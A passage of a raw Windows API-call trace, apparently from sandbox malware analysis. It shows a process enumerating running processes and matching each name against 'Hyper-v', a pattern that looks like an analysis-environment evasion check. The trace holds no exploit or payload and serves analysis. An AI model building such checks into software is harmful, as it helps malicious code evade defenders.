WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.395] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35705c0 [0102.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35705c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.395] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.395] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.395] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.396] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570548 [0102.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570548, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.397] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.397] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.398] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570710 [0102.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570710, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.398] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.398] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.398] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.399] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570740 [0102.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570740, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.399] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.399] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.399] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.400] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35704e8 [0102.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35704e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.400] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.400] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.400] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.401] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570770 [0102.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.401] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.401] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.401] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.402] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35706c8 [0102.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35706c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.402] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.402] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.402] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.403] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570788 [0102.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570788, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.403] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.403] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.403] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.404] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570758 [0102.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570758, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.404] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.404] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.404] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.406] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35706e0 [0102.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35706e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.406] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.406] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.406] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.407] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35704a0 [0102.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x35704a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0102.407] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0102.407] StrStrIA (lpFirst="spoolsv.exe", lpSrch="Hyper-v") returned 0x0 [0102.407] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.408] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35704b8 [0102.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35704b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.408] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.408] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.408] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.409] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35704d0 [0102.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35704d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0102.409] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0102.409] StrStrIA (lpFirst="audiodg.exe", lpSrch="Hyper-v") returned 0x0 [0102.409] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0102.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0102.469] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ecb8 [0102.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356ecb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0102.469] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0102.469] StrStrIA (lpFirst="sihost.exe", lpSrch="Hyper-v") returned 0x0 [0102.469] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.470] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ecd0 [0102.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356ecd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0102.470] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0102.470] StrStrIA (lpFirst="svchost.exe", lpSrch="Hyper-v") returned 0x0 [0102.470] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0102.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.471] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356ece8 [0102.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356ece8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0102.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0102.471] StrStrIA (lpFirst="taskhostw.exe", lpSrch="Hyper-v") returned 0x0 [0102.471] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.477] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ed00 [0102.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356ed00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0102.477] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0102.477] StrStrIA (lpFirst="explorer.exe", lpSrch="Hyper-v") returned 0x0 [0102.477] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0102.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.478] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f620 [0102.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357f620, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0102.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0102.478] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="Hyper-v") returned 0x0 [0102.478] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0102.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.479] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e820 [0102.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x357e820, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0102.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0102.479] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="Hyper-v") returned 0x0 [0102.480] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0102.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0102.480] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357f660 [0102.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357f660, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0102.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0102.481] StrStrIA (lpFirst="Memory Compression", lpSrch="Hyper-v") returned 0x0 [0102.481] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0102.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0102.482] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357f7c0 [0102.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357f7c0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0102.482] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0102.482] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="Hyper-v") returned 0x0 [0102.482] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0102.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.483] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356ed60 [0102.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356ed60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0102.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0102.483] StrStrIA (lpFirst="SearchUI.exe", lpSrch="Hyper-v") returned 0x0 [0102.483] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0102.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0102.484] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f720 [0102.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357f720, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0102.484] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0102.484] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="Hyper-v") returned 0x0 [0102.484] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, 